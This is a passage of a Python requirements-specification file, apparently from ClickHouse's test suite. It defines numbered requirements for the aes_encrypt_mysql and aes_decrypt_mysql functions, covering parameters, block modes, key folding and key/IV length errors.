),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_InitializationVector_Length_TooLong = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.InitializationVector.Length.TooLong',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL use the first `N` bytes that are required if the `iv` is specified and\n'
'its length is longer than required for the `aes_encrypt_mysql` function for a given block mode.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_InitializationVector_NotValidForMode = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.InitializationVector.NotValidForMode',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error if the `iv` is specified for the `aes_encrypt_mysql`\n'
'function for a mode that does not need it.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_AES_128_ECB_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.AES-128-ECB.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt_mysql` function is set to `aes-128-ecb` and `key` is less than 16 bytes\n'
'or `iv` is specified.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_AES_192_ECB_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.AES-192-ECB.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt_mysql` function is set to `aes-192-ecb` and `key` is less than 24 bytes\n'
'or `iv` is specified.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_AES_256_ECB_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.AES-256-ECB.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt_mysql` function is set to `aes-256-ecb` and `key` is less than 32 bytes\n'
'or `iv` is specified.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_AES_128_CBC_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.AES-128-CBC.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt_mysql` function is set to `aes-128-cbc` and `key` is less than 16 bytes\n'
'or if specified `iv` is less than 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_AES_192_CBC_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.AES-192-CBC.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt_mysql` function is set to `aes-192-cbc` and `key` is less than 24 bytes\n'
'or if specified `iv` is less than 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_AES_256_CBC_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.AES-256-CBC.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt_mysql` function is set to `aes-256-cbc` and `key` is less than 32 bytes\n'
'or if specified `iv` is less than 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_AES_128_CFB1_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.AES-128-CFB1.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt_mysql` function is set to `aes-128-cfb1` and `key` is less than 16 bytes\n'
'or if specified `iv` is less than 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_AES_192_CFB1_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.AES-192-CFB1.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt_mysql` function is set to `aes-192-cfb1` and `key` is less than 24 bytes\n'
'or if specified `iv` is less than 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_AES_256_CFB1_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.AES-256-CFB1.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt_mysql` function is set to `aes-256-cfb1` and `key` is less than 32 bytes\n'
'or if specified `iv` is less than 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_AES_128_CFB8_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.AES-128-CFB8.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt_mysql` function is set to `aes-128-cfb8` and `key` is less than 16 bytes\n'
'and if specified `iv` is less than 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_AES_192_CFB8_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.AES-192-CFB8.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt_mysql` function is set to `aes-192-cfb8` and `key` is less than 24 bytes\n'
'or if specified `iv` is less than 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_AES_256_CFB8_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.AES-256-CFB8.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt_mysql` function is set to `aes-256-cfb8` and `key` is less than 32 bytes\n'
'or if specified `iv` is less than 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_AES_128_CFB128_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.AES-128-CFB128.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt_mysql` function is set to `aes-128-cfb128` and `key` is less than 16 bytes\n'
'or if specified `iv` is less than 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_AES_192_CFB128_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.AES-192-CFB128.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt_mysql` function is set to `aes-192-cfb128` and `key` is less than 24 bytes\n'
'or if specified `iv` is less than 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_AES_256_CFB128_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.AES-256-CFB128.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt_mysql` function is set to `aes-256-cfb128` and `key` is less than 32 bytes\n'
'or if specified `iv` is less than 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_AES_128_OFB_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.AES-128-OFB.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt_mysql` function is set to `aes-128-ofb` and `key` is less than 16 bytes\n'
'or if specified `iv` is less than 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_AES_192_OFB_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.AES-192-OFB.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt_mysql` function is set to `aes-192-ofb` and `key` is less than 24 bytes\n'
'or if specified `iv` is less than 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Encrypt_Function_AES_256_OFB_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Encrypt.Function.AES-256-OFB.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_encrypt_mysql` function is set to `aes-256-ofb` and `key` is less than 32 bytes\n'
'or if specified `iv` is less than 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes_decrypt_mysql` function to decrypt data using [AES].\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Syntax = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Syntax',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support the following syntax for the `aes_decrypt_mysql` function\n'
'\n'
'```sql\n'
'aes_decrypt_mysql(ciphertext, key, mode, [iv])\n'
'```\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_CipherText = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.CipherText',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `ciphertext` accepting any data type as\n'
'the first parameter to the `aes_decrypt_mysql` function that SHALL specify the data to be decrypted.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Key = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Key',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `key` with `String` or `FixedString` data types\n'
'as the second parameter to the `aes_decrypt_mysql` function that SHALL specify the encryption key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `mode` with `String` or `FixedString` data types as the third parameter\n'
'to the `aes_decrypt_mysql` function that SHALL specify encryption key length and block encryption mode.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_ValuesFormat = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.ValuesFormat',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support values of the form `aes-[key length]-[mode]` for the `mode` parameter\n'
'of the `aes_decrypt_mysql` function where\n'
'the `key_length` SHALL specifies the length of the key and SHALL accept\n'
'`128`, `192`, or `256` as the values and the `mode` SHALL specify the block encryption\n'
'mode and SHALL accept [ECB], [CBC], [CFB1], [CFB8], [CFB128], or [OFB]. For example, `aes-256-ofb`.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_Value_Invalid = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.Value.Invalid',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error if the specified value for the `mode` parameter of the `aes_decrypt_mysql`\n'
'function is not valid with the exception where such a mode is supported by the underlying\n'
'[OpenSSL] implementation.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_Value_AES_128_ECB = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.Value.AES-128-ECB',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-128-ecb` as the value for the `mode` parameter of the `aes_decrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [ECB] block mode encryption with a 128 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_Value_AES_192_ECB = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.Value.AES-192-ECB',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-192-ecb` as the value for the `mode` parameter of the `aes_decrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [ECB] block mode encryption with a 192 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_Value_AES_256_ECB = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.Value.AES-256-ECB',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-256-ecb` as the value for the `mode` parameter of the `aes_decrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [ECB] block mode encryption with a 256 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_Value_AES_128_CBC = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.Value.AES-128-CBC',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-128-cbc` as the value for the `mode` parameter of the `aes_decrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [CBC] block mode encryption with a 128 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_Value_AES_192_CBC = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.Value.AES-192-CBC',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-192-cbc` as the value for the `mode` parameter of the `aes_decrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [CBC] block mode encryption with a 192 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_Value_AES_256_CBC = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.Value.AES-256-CBC',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-256-cbc` as the value for the `mode` parameter of the `aes_decrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [CBC] block mode encryption with a 256 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_Value_AES_128_CFB1 = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.Value.AES-128-CFB1',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-128-cfb1` as the value for the `mode` parameter of the `aes_decrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [CFB1] block mode encryption with a 128 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_Value_AES_192_CFB1 = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.Value.AES-192-CFB1',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-192-cfb1` as the value for the `mode` parameter of the `aes_decrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [CFB1] block mode encryption with a 192 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_Value_AES_256_CFB1 = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.Value.AES-256-CFB1',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-256-cfb1` as the value for the `mode` parameter of the `aes_decrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [CFB1] block mode encryption with a 256 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_Value_AES_128_CFB8 = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.Value.AES-128-CFB8',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-128-cfb8` as the value for the `mode` parameter of the `aes_decrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [CFB8] block mode encryption with a 128 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_Value_AES_192_CFB8 = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.Value.AES-192-CFB8',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-192-cfb8` as the value for the `mode` parameter of the `aes_decrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [CFB8] block mode encryption with a 192 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_Value_AES_256_CFB8 = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.Value.AES-256-CFB8',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-256-cfb8` as the value for the `mode` parameter of the `aes_decrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [CFB8] block mode encryption with a 256 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_Value_AES_128_CFB128 = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.Value.AES-128-CFB128',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-128-cfb128` as the value for the `mode` parameter of the `aes_decrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [CFB128] block mode encryption with a 128 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_Value_AES_192_CFB128 = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.Value.AES-192-CFB128',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-192-cfb128` as the value for the `mode` parameter of the `aes_decrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [CFB128] block mode encryption with a 192 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_Value_AES_256_CFB128 = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.Value.AES-256-CFB128',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-256-cfb128` as the value for the `mode` parameter of the `aes_decrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [CFB128] block mode encryption with a 256 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_Value_AES_128_OFB = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.Value.AES-128-OFB',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-128-ofb` as the value for the `mode` parameter of the `aes_decrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [OFB] block mode encryption with a 128 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_Value_AES_192_OFB = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.Value.AES-192-OFB',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-192-ofb` as the value for the `mode` parameter of the `aes_decrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [OFB] block mode encryption with a 192 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_Value_AES_256_OFB = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.Value.AES-256-OFB',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `aes-256-ofb` as the value for the `mode` parameter of the `aes_decrypt_mysql` function\n'
'and [AES] algorithm SHALL use the [OFB] block mode encryption with a 256 bit key.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_Value_AES_128_GCM_Error = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.Value.AES-128-GCM.Error',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error if `aes-128-gcm` is specified as the value for the `mode` parameter of the\n'
'`aes_decrypt_mysql` function.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_Value_AES_192_GCM_Error = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.Value.AES-192-GCM.Error',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error if `aes-192-gcm` is specified as the value for the `mode` parameter of the\n'
'`aes_decrypt_mysql` function.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_Value_AES_256_GCM_Error = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.Value.AES-256-GCM.Error',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error if `aes-256-gcm` is specified as the value for the `mode` parameter of the\n'
'`aes_decrypt_mysql` function.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_Value_AES_128_CTR_Error = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.Value.AES-128-CTR.Error',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error if `aes-128-ctr` is specified as the value for the `mode` parameter of the\n'
'`aes_decrypt_mysql` function.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_Value_AES_192_CTR_Error = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.Value.AES-192-CTR.Error',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error if `aes-192-ctr` is specified as the value for the `mode` parameter of the\n'
'`aes_decrypt_mysql` function.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_Mode_Value_AES_256_CTR_Error = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.Mode.Value.AES-256-CTR.Error',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error if `aes-256-ctr` is specified as the value for the `mode` parameter of the\n'
'`aes_decrypt_mysql` function.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_InitializationVector = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.InitializationVector',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL support `iv` with `String` or `FixedString` data types as the optional fourth\n'
'parameter to the `aes_decrypt_mysql` function that SHALL specify the initialization vector for block modes that require\n'
'it.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Parameters_ReturnValue = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Parameters.ReturnValue',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return the decrypted value of the data\n'
'using `String` data type as the result of `aes_decrypt_mysql` function.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Key_Length_TooShortError = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Key.Length.TooShortError',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error if the `key` length is less than the minimum for the `aes_decrypt_mysql`\n'
'function for a given block mode.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_Key_Length_TooLong = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.Key.Length.TooLong',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL use folding algorithm specified below if the `key` length is longer than required\n'
'for the `aes_decrypt_mysql` function for a given block mode.\n'
'\n'
'```python\n'
'def fold_key(key, cipher_key_size):\n'
' key = list(key) if not isinstance(key, (list, tuple)) else key\n'
'\t folded_key = key[:cipher_key_size]\n'
'\t for i in range(cipher_key_size, len(key)):\n'
'\t\t print(i % cipher_key_size, i)\n'
'\t\t folded_key[i % cipher_key_size] ^= key[i]\n'
'\t return folded_key\n'
'```\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_InitializationVector_Length_TooShortError = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.InitializationVector.Length.TooShortError',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error if the `iv` length is specified and is less than the minimum\n'
'that is required for the `aes_decrypt_mysql` function for a given block mode.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_InitializationVector_Length_TooLong = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.InitializationVector.Length.TooLong',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL use the first `N` bytes that are required if the `iv` is specified and\n'
'its length is longer than required for the `aes_decrypt_mysql` function for a given block mode.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_InitializationVector_NotValidForMode = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.InitializationVector.NotValidForMode',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error if the `iv` is specified for the `aes_decrypt_mysql`\n'
'function for a mode that does not need it.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_AES_128_ECB_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.AES-128-ECB.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt_mysql` function is set to `aes-128-ecb` and `key` is less than 16 bytes\n'
'or `iv` is specified.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_AES_192_ECB_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.AES-192-ECB.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt_mysql` function is set to `aes-192-ecb` and `key` is less than 24 bytes\n'
'or `iv` is specified.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_AES_256_ECB_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.AES-256-ECB.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt_mysql` function is set to `aes-256-ecb` and `key` is less than 32 bytes\n'
'or `iv` is specified.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_AES_128_CBC_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.AES-128-CBC.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt_mysql` function is set to `aes-128-cbc` and `key` is less than 16 bytes\n'
'or if specified `iv` is less than 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_AES_192_CBC_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.AES-192-CBC.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt_mysql` function is set to `aes-192-cbc` and `key` is less than 24 bytes\n'
'or if specified `iv` is less than 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_AES_256_CBC_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.AES-256-CBC.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
group=None,
type=None,
uid=None,
description=(
'[ClickHouse] SHALL return an error when `mode` for the `aes_decrypt_mysql` function is set to `aes-256-cbc` and `key` is less than 32 bytes\n'
'or if specified `iv` is less than 16 bytes.\n'
),
link=None
)
RQ_SRS008_AES_MySQL_Decrypt_Function_AES_128_CFB1_KeyAndInitializationVector_Length = Requirement(
name='RQ.SRS008.AES.MySQL.Decrypt.Function.AES-128-CFB1.KeyAndInitializationVector.Length',
version='1.0',
priority=None,
